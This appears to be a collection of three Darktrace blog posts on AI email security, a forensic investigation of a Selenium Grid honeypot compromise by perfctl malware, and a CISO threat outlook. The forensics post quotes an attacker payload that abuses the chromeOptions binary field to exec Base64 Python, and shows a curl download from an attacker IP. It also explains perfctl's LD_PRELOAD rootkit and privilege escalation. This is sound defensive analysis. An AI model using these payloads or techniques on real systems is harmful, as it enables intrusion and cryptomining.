April 10, 2023

Employee-Conscious Email Security Solutions in the Workforce

Email threats commonly affect organizations. Read Darktrace's expert insights on how to safeguard your business by educating employees about email security.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Written by
Carlos Gray
Senior Product Marketing Manager, Email

When considering email security, IT teams have historically had to choose between excluding employees entirely, or including them but giving them too much power and implementing unenforceable, trust-based policies that try to make up for it. 

However, just because email security should not rely on employees, this does not mean they should be excluded entirely. Employees are the ones interacting with emails daily, and their experiences and behaviors can provide valuable security insights and even influence productivity. 

AI technology can support employee engagement in a non-intrusive, nuanced way that not only maintains email security, but also enhances it. 

Finding a Balance of Employee Involvement in Security Strategies

Historically, security solutions offered ‘all or nothing’ approaches to employee engagement. On one hand, when employees are involved, they are unreliable. Employees cannot all be experts in security on top of their actual job responsibilities, and mistakes are bound to happen in fast-paced environments.  

Although there have been attempts to raise security awareness, they often fall short: training emails lack context and realism, leaving employees with a poor understanding that often leads to them reporting emails that are actually safe. Having users constantly triaging their inboxes and reporting safe emails wastes time, detracting from their own productivity as well as that of the security team.

Other historic forms of employee involvement also put security at risk. For example, users could create blanket rules through feedback, which could lead to common problems like safe-listing every email that comes from the gmail.com domain. Other times, employees could choose for themselves to release emails without context or limitations, introducing major risks to the organization. While these types of actions allow employees to participate in security, they do so at the cost of security itself. 

Even lower stakes employee involvement can prove ineffective. For example, excessive warnings when sending emails to external contacts can lead to banner fatigue. When employees see the same warning message or alert at the top of every message, it’s human nature that they soon become accustomed and ultimately immune to it.

On the other hand, when employees are fully excluded from security, an opportunity is missed to fine-tune security according to the actual users and to gain feedback on how well the email security solution is working. 

So, both options of historically conventional email security, to include or exclude employees, prove incapable of leveraging employees effectively. The best email security practice strikes a balance between these two extremes, allowing more nuanced interactions that maintain security without interrupting daily business operations. This can be achieved with AI that tailors the interactions specifically to each employee to add to security instead of detracting from it. 

Reducing False Reports While Improving Security Awareness Training 

Humans and AI-powered email security can simultaneously level up by working together. AI can inform employees and employees can inform AI in an employee-AI feedback loop.  

By understanding ‘normal’ behavior for every email user, AI can identify unusual, risky components of an email and take precise action based on the nature of the email to neutralize them, such as rewriting links, flattening attachments, and moving emails to junk. AI can go one step further and explain in non-technical language why it has taken a specific action, which educates users. In contrast to point-in-time simulated phishing email campaigns, this means AI can share its analysis in context and in real time at the moment a user is questioning an email. 

The employee-AI feedback loop educates employees so that they can serve as additional enrichment data. It determines the appropriate levels to inform and teach users, while not relying on them for threat detection.

In the other direction, the AI learns from users’ activity in the inbox and gradually factors this into its decision-making. This is not a ‘one size fits all’ mechanism – one employee marking an email as safe will never result in blanket approval across the business – but over time, patterns can be observed and autonomous decision-making enhanced.  

Figure 1: The employee-AI feedback loop increases employee understanding without putting security at risk.

The employee-AI feedback loop draws out the maximum potential benefits of employee involvement in email security. Other email security solutions only consider the security team, enhancing its workflow but never considering the employees that report suspicious emails. Employees who try to do the right thing but blindly report emails never learn or improve and end up wasting their own time. By considering employees and improving security awareness training, the employee-AI feedback loop can level up users. They learn from the AI explanations how to identify malicious components, and so then report fewer emails but with greater accuracy. 

While AI programs have classically acted like black boxes, Darktrace trains its AI on the best data, the organization’s actual employees, and invites both the security team and employees to see the reasoning behind its conclusions. Over time, employees will trust themselves more as they better learn how to discern unsafe emails. 

Leveraging AI to Generate Productivity Gains

Uniquely, AI-powered email security can have effects outside of security-related areas. It can save time by managing non-productive email. As the AI constantly learns employee behavior in the inbox, it becomes extremely effective at detecting spam and graymail – emails that aren't necessarily malicious, but clutter inboxes and hamper productivity. It does this on a per-user basis, specific to how each employee treats spam, graymail, and newsletters. The AI learns to detect this clutter and eventually learns which to pull from the inbox, saving time for the employees. This highlights how security solutions can go even further than merely protecting the email environment with a light touch, to the point where AI can promote productivity gains by automating tasks like inbox sorting.

Preventing Email Mishaps: How to Deal with Human Error

Improved user understanding and decision making cannot stop natural human error. Employees are bound to make mistakes and can easily send emails to the wrong people, especially when Outlook auto-fills the wrong recipient. This can have effects ranging anywhere from embarrassing to critical, with major implications on compliance, customer trust, confidential intellectual property, and data loss. 

However, AI can help reduce instances of accidentally sending emails to the wrong people. When a user goes to send an email in Outlook, the AI will analyze the recipients. It considers the contextual relationship between the sender and recipients, the relationships the recipients have with each other, how similar each recipient’s name and history is to other known contacts, and the names of attached files.  

If the AI determines that the email is outside of a user’s typical behavior, it may alert the user. Security teams can customize what the AI does next: it can block the email, block the email but allow the user to override it, or do nothing but invite the user to think twice. Since the AI analyzes each email, these alerts are more effective than consistent, blanket alerts warning about external recipients, which often go ignored. With this targeted approach, the AI prevents data leakage and reduces cyber risk. 
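As a rough sketch of how such a recipient check might work in principle (this is illustrative only, not Darktrace's actual model; the function name and scoring are assumptions), one of the simplest signals is how many of the outgoing recipients the sender has never emailed before:

```python
# Illustrative sketch (not Darktrace's implementation): scoring how unusual
# a set of recipients is for a given sender, based on past sending history.
from collections import Counter

def recipient_anomaly_score(sender_history, recipients):
    """Return a 0-1 score; higher means the recipient set is more unusual.

    sender_history: list of past recipient addresses for this sender.
    recipients: addresses on the outgoing email being checked.
    """
    seen = Counter(sender_history)
    if not seen:
        return 1.0  # no history at all: treat as maximally unusual
    # Fraction of recipients the sender has never emailed before
    unseen = [r for r in recipients if seen[r] == 0]
    return len(unseen) / len(recipients)

history = ["alice@corp.com"] * 40 + ["bob@corp.com"] * 10
print(recipient_anomaly_score(history, ["alice@corp.com"]))   # familiar -> 0.0
print(recipient_anomaly_score(history, ["alise@c0rp.com"]))   # look-alike, never seen -> 1.0
```

A production system would weight many more signals, as the text describes (recipient-to-recipient relationships, look-alike names, attachment names), but the thresholding idea is the same: only emails that deviate from the sender's learned normal trigger a prompt.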

Since the AI is always on and continuously learning, it can adapt autonomously to employee changes. If the role of an employee evolves, the AI will learn the new normal, including common behaviors, recipients, attached file names, and more. This allows the AI to continue effectively flagging potential instances of human error, without needing manual rule changes or disrupting the employee’s workflow. 

Email Security Informed by Employee Experience

As the practical users of email, employees should be considered when designing email security. This employee-conscious lens to security can strengthen defenses, improve productivity, and prevent data loss.  

In these ways, email security can benefit both employees and security teams. Employees can become another layer of defense with improved security awareness training that cuts down on false reports of safe emails. This insight into employee email behavior can also enhance employee productivity by learning and sorting graymail. Finally, viewing security in relation to employees can help security teams deploy tools that reduce data loss by flagging misdirected emails. With these capabilities, Darktrace/Email™ enables security teams to optimize the balance of employee involvement in email security.


March 5, 2026

Inside Cloud Compromise: Investigating Attacker Activity with Darktrace / Forensic Acquisition & Investigation


Investigating cloud attacks with Darktrace / Forensic Acquisition & Investigation

Darktrace / Forensic Acquisition & Investigation™ is the industry’s first truly automated forensic solution purpose-built for the cloud. This blog will demonstrate how an investigation can be carried out against a compromised cloud server in minutes, rather than hours or days.

The compromised server investigated in this case originates from Darktrace’s Cloudypots system, a global honeypot network designed to observe adversary activity in real time across a wide range of cloud services. Whenever an attacker successfully compromises one of these honeypots, a forensic copy of the virtual server's disk is preserved for later analysis. Using Forensic Acquisition & Investigation, analysts can then investigate further and obtain detailed insights into the compromise including complete attacker timelines and root cause analysis.

Forensic Acquisition & Investigation supports importing artifacts from a variety of sources, including EC2 instances, ECS, S3 buckets, and more. The Cloudypots system produces a raw disk image whenever an attack is detected and stores it in an S3 bucket. This allows the image to be directly imported into Forensic Acquisition & Investigation using the S3 bucket import option.

As Forensic Acquisition & Investigation runs cloud-natively, no additional configuration is required to add a specific S3 bucket. Analysts can browse and acquire forensic assets from any bucket that the configured IAM role is permitted to access. Operators can also add additional IAM credentials, including those from other cloud providers, to extend access across multiple cloud accounts and environments.

Figure 1: Forensic Acquisition & Investigation import screen.

Forensic Acquisition & Investigation then retrieves a copy of the file and automatically begins running the analysis pipeline on the artifact. This pipeline performs a full forensic analysis of the disk and builds a timeline of the activity that took place on the compromised asset. By leveraging Forensic Acquisition & Investigation’s cloud-native analysis system, this process condenses hours of manual work into just minutes.

Figure 2: Successful import of a forensic artifact and initiation of the analysis pipeline.

Once processing is complete, the preserved artifact is visible in the Evidence tab, along with a summary of key information obtained during analysis, such as the compromised asset’s hostname, operating system, cloud provider, and key event count.

Figure 3: The Evidence overview showing the acquired disk image.

Clicking on the “Key events” field in the listing opens the timeline view, automatically filtered to show system-generated alarms.

The timeline provides a chronological record of every event that occurred on the system, derived from multiple sources, including:

  • Parsed log files such as the systemd journal, audit logs, application-specific logs, and others.
  • Parsed history files such as .bash_history, allowing executed commands to be shown on the timeline.
  • File-specific events, such as files being created, accessed, modified, or executables being run, etc.

This approach allows timestamped information and events from multiple sources to be aggregated and parsed into a single, concise view, greatly simplifying the data review process.
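As a rough illustration of this aggregation step (not the product's implementation; the event fields and sample entries below are assumptions for demonstration), timestamped events parsed from several sources can be merged into one ordered timeline:

```python
# Illustrative sketch: merging timestamped events from multiple parsed
# sources (system journal, shell history, filesystem metadata) into a
# single chronological timeline, as described above.
import heapq

def build_timeline(*sources):
    """Merge per-source event lists (each already sorted by time) into one timeline."""
    return list(heapq.merge(*sources, key=lambda e: e["timestamp"]))

journal = [
    {"timestamp": "2026-02-18T09:09:12Z", "source": "systemd-journal",
     "message": "session opened for user ubuntu"},
]
shell_history = [
    {"timestamp": "2026-02-18T09:10:03Z", "source": ".bash_history",
     "message": "curl -O hxxp://200.4.115.1/promocioni.php"},
]
fs_events = [
    {"timestamp": "2026-02-18T09:10:05Z", "source": "filesystem",
     "message": "file created: /tmp/promocioni.php"},
]

for event in build_timeline(journal, shell_history, fs_events):
    print(event["timestamp"], event["source"], event["message"])
```

Because every source is normalized to the same timestamp format, a lazy k-way merge keeps the combined view in strict chronological order without re-sorting the whole dataset.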

Alarms are created for specific timeline events that match either a built-in system rule curated by Darktrace’s Threat Research team, or an operator-defined rule created at the project level. These alarms help quickly filter out noise and highlight events of interest, such as the creation of a file containing known malware, access to sensitive files like Amazon Web Services (AWS) credentials, suspicious arguments or commands, and more.

Figure 4: The timeline view filtered to alarm_severity: “1” OR alarm_severity: “3”, showing only events that matched an alarm rule.

In this case, several alarms were generated for suspicious Base64 arguments being passed to Selenium. Examining the event data, it appears the attacker spawned a Selenium Grid session with the following payload:

"request.payload": "[Capabilities {browserName: chrome, goog:chromeOptions: {args: [-cimport base64;exec(base64...], binary: /usr/bin/python3, extensions: []}, pageLoadStrategy: normal}]"

This is a common attack vector for Selenium Grid. The chromeOptions object is intended to specify arguments for how Google Chrome should be launched; however, in this case the attacker has abused the binary field to execute the Python3 binary instead of Chrome. Combined with the option to specify command-line arguments, the attacker can use Python3’s -c option to execute arbitrary Python code, in this instance, decoding and executing a Base64 payload.
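To illustrate the mechanics of this vector (using a harmless stand-in payload rather than the attacker's script), the stub passed via Python's `-c` option simply decodes and `exec`s Base64 data:

```python
# Illustrative sketch of the technique described above: a short stub,
# of the kind an attacker would pass via python3 -c, that decodes and
# executes a Base64-encoded payload. The payload here is a harmless
# print, standing in for the attacker's real script.
import base64

payload = b"print('payload executed')"
encoded = base64.b64encode(payload).decode()

# The attacker-supplied "argument" would look something like:
stub = f"import base64;exec(base64.b64decode('{encoded}'))"
print(stub)

# Executing the stub reproduces the original payload's behaviour:
exec(stub)  # prints: payload executed
```

Encoding the payload keeps it a single shell-safe token and hides its contents from casual log review, which is exactly why the truncated Base64 blob in the Selenium logs warranted an alarm.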

Selenium’s logs truncate the Arguments field automatically, so an alternate method is required to retrieve the full payload. To do this, the search bar can be used to find all events that occurred around the same time as this flagged event.

Figure 5: Pivoting off the previous event by filtering the timeline to events within the same window using timestamp: [“2026-02-18T09:09:00Z” TO “2026-02-18T09:12:00Z”].

Scrolling through the search results, an entry from Java’s systemd journal can be identified. This log contains the full, unaltered payload. GCHQ’s CyberChef can then be used to decode the Base64 data into the attacker’s script, which will ultimately be executed.

Figure 6: Decoding the attacker’s payload in CyberChef.

In this instance, the malware was identified as a variant of a campaign that has been previously documented in depth by Darktrace.

Investigating Perfctl Malware

This campaign deploys a malware sample known as ‘perfctl’ to the compromised host. The script executed by the attacker downloads a Go binary named “promocioni.php” from 200[.]4.115.1. Its functionality is consistent with previously documented perfctl samples, with only minor changes such as updated filenames and a new command-and-control (C2) domain.

Perfctl is a stealthy malware with several mechanisms designed to evade detection. The main binary is packed with UPX, with the header intentionally tampered with to prevent unpacking using regular tools. The binary also avoids executing any malicious code if it detects debugging or tracing activity, or if artifacts left by earlier stages are missing.

To further aid its evasive capabilities, perfctl features a usermode rootkit installed via LD_PRELOAD. This causes dynamically linked executables to load perfctl’s rootkit payload before other system libraries, allowing it to override functions, for example intercepting calls that list files and filtering entries out of the returned list. Perfctl uses this to hide its own files, as well as related files like ld.so.preload, preventing users from identifying that a rootkit is present in the first place.

This also makes it difficult to dynamically analyze, as even analysts aware of the rootkit will struggle to get around it due to its aggressiveness in hiding its components. A useful trick is to use the busybox-static utilities, which are statically linked and therefore immune to LD preloading.

Perfctl will attempt to use sudo to escalate its permissions to root if the user it was executed as has the required privileges. Failing this, it will attempt to exploit the vulnerability CVE-2021-4034.

Ultimately, perfctl will attempt to establish a C2 link via Tor and spawn an XMRig miner to mine the Monero cryptocurrency. The traffic to the mining pool is encapsulated within Tor to limit network detection of the mining traffic.

Darktrace’s Cloudypots system has observed 1,959 infections of the perfctl campaign across its honeypot network in the past year, making it one of the most aggressive campaigns seen by Darktrace.

Key takeaways

This blog has shown how Darktrace / Forensic Acquisition & Investigation equips defenders in the face of a real-world attacker campaign. By using this solution, organizations can acquire forensic evidence and investigate intrusions across multiple cloud resources and providers, enabling defenders to see the full picture of an intrusion on day one. Forensic Acquisition & Investigation’s patented data-processing system takes advantage of the cloud’s scale to rapidly process large amounts of data, allowing triage to take minutes, not hours.

Darktrace / Forensic Acquisition & Investigation is available as Software-as-a-Service (SaaS) but can also be deployed on-premises as a virtual application or natively in the cloud, providing flexibility between convenience and data sovereignty to suit any use case.

Support for acquiring traditional compute instances like EC2, as well as more exotic and newly targeted platforms such as ECS and Lambda, ensures that attacks taking advantage of Living-off-the-Cloud (LOTC) strategies can be triaged quickly and easily as part of incident response. As attackers continue to develop new techniques, the ability to investigate how they use cloud services to persist and pivot throughout an environment is just as important to triage as a single compromised EC2 instance.

Credit to Nathaniel Bill (Malware Research Engineer)


March 2, 2026

What the Darktrace Annual Threat Report 2026 Means for Security Leaders


The challenge for today’s CISOs

At the broadest level, the defining characteristic of cybersecurity in 2026 is the sheer pace of change shaping the environments we protect. Organizations are operating in ecosystems that are larger, more interconnected, and more automated than ever before – spanning cloud platforms, distributed identities, AI-driven systems, and continuous digital workflows.  

The velocity of this expansion has outstripped the slower, predictable patterns security teams once relied on. What used to be a stable backdrop is now a living, shifting landscape where technology, risk, and business operations evolve simultaneously. From this vantage point, the central challenge for security leaders isn’t reacting to individual threats, but maintaining strategic control and clarity as the entire environment accelerates around them.

Strategic takeaways from the Annual Threat Report

The Darktrace Annual Threat Report 2026 reinforces a reality every CISO feels: the center of gravity isn’t the perimeter, vulnerability management, or malware, but trust abused via identity. For example, our analysis found that nearly 70% of incidents in the Americas region begin with stolen or misused accounts, reflecting the global shift toward identity-led intrusions.

Mass adoption of AI agents, cloud-native applications, and machine decision-making means CISOs now oversee systems that act on their own. This creates an entirely new responsibility: ensuring those systems remain safe, predictable, and aligned to business intent, even under adversarial pressure.

Attackers increasingly exploit trust boundaries, not firewalls – leveraging cloud entitlements, SaaS identity transitions, supply-chain connectivity, and automation frameworks. The rise of non-human identities intensifies this: credentials, tokens, and agent permissions now form the backbone of operational risk.

Boards are now evaluating CISOs on business continuity, operational recovery, and whether AI systems and cloud workloads can fail safely without cascading or causing catastrophic impact.

In this environment, detection accuracy, autonomous response, and blast radius minimization matter far more than traditional control coverage or policy checklists.

Every organization will face setbacks; resilience is measured by how quickly security teams can rise, respond, and resume momentum. In 2026, success will belong to those that adapt fastest.

Managing business security in the age of AI

CISO accountability in 2026 has expanded far beyond controls and tooling. Whether we asked for it or not, we now own outcomes tied to business resilience, AI trust, cloud assurance, and continuous availability. The role is less about certainty and more about recovering control in an environment that keeps accelerating.

Every major 2026 initiative – AI agents, third-party risk, cloud, or comms protection – connects to a single board-level question: Are we still in control as complexity and automation scale faster than humans?

Attackers are not just getting more sophisticated; they are becoming more automated. AI changes the economics of attack, lowering cost and increasing speed. That asymmetry is what CISOs are being measured against.

CISOs are no longer evaluated on tool coverage, but on the ability to assure outcomes – trust in AI adoption, resilience across cloud and identity, and being able to respond to unknown and unforeseen threats.

Boards are now explicitly asking whether we can defend against AI-driven threats. No one can predict every new behavior – survival depends on detecting malicious deviations from normal fast and responding autonomously.  

Agents introduce decision-making at machine speed. Governance, CI/CD scanning, posture management, red teaming, and runtime detection are no longer differentiators but the baseline.

Cloud security is no longer architectural, it is operational. Identity, control planes, and SaaS exposure now sit firmly with the CISO.

AI-speed threats already reshaping security in 2026

We’re already seeing clear examples of how quickly the threat landscape has shifted in 2026. Darktrace’s work on React2Shell exposed just how unforgiving the new tempo is: a honeypot stood up with an exposed React instance was hit in under two minutes. There was no recon phase, no gradual probing – just immediate, automated exploitation the moment the code appeared publicly. Exposure now equals compromise unless defenses can detect, interpret, and act at machine speed. Traditional operational rhythms simply don’t map to this reality.

We’re also facing the first wave of AI-authored malware, where LLMs generate code that mutates on demand. This removes the historic friction from the attacker side: no skill barrier, no time cost, no limit on iteration. Malware families can regenerate themselves, shift structure, and evade static controls without a human operator behind the keyboard. This forces CISOs to treat adversarial automation as a core operational risk and ensure that autonomous systems inside the business remain predictable under pressure.

The CVE-2026-1731 BeyondTrust exploitation wave reinforced the same pattern. The gap between disclosure and active, global exploitation compressed into hours. Automated scanning, automated payload deployment, coordinated exploitation campaigns, all spinning up faster than most organizations can push an emergency patch through change control. The vulnerability-to-exploit window has effectively collapsed, making runtime visibility, anomaly detection, and autonomous containment far more consequential than patching speed alone.

These cases aren’t edge scenarios; they represent the emerging norm. Complexity and automation have outpaced human-scale processes, and attackers are weaponizing that asymmetry.  

The real differentiator for CISOs in 2026 is less about knowing everything and more about knowing immediately when something shifts – and having systems that can respond at the same speed.


About the author
Mike Beck
Global CISO